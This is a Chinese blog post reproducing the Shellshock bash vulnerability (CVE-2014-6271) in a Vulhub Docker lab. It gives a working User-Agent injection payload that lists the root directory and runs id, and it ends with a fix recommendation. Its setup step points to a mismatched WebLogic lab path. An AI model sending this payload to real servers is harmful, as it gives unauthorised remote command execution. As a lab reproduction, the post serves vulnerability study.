CVE-2014-6271-Shellshock-RCE
forg12
  2022-10-27 15:29:06 2022-10-27 15:29      271 字  

描述

​ Shellshock,又称Bashdoor,是一个安全漏洞,于2014年9月12日被发现,直到9月24日被赋予了CVE编号CVE-2014-6271才得以控制。该漏洞与Bash有关,Bash是一种广泛使用的Unix shell。此漏洞影响所有Linux发行版,并允许使用环境变量远程执行命令。

影响版本

bash <= 4.3

漏洞检测

如果在User-Agent中加入一下命令有回显,则说明存在漏洞。

1
() { :;};echo;echo $(/bin/ls -al /);/usr/bin/id;

环境搭建

使用vulnhub环境来复现该漏洞。

1
2
3
4
#进入漏洞目录
cd vulhub/weblogic/CVE-2020-14882
#开启环境
docker-compose up -d

image-20221027153254242

这里有个问题,直接启动环境访问会报错。

image-20221027171927528

原因是权限不够

image-20221027172044312

查看环境

1
2
http://192.168.3.79:8080/victim.cgi
http://192.168.3.79:8080/safe.cgi

image-20221027171231564

image-20221027171154971

复现过程

这里有两个cgi文件提供作为对比。,进入docker环境查看区别主要在于调用的bash版本不一样。

image-20221027172205059

image-20221027172324209

bp抓包,修改User-Agent

1
() { :;};echo;echo $(/bin/ls -al /);/usr/bin/id;

image-20221027171720176

修复建议

升级bash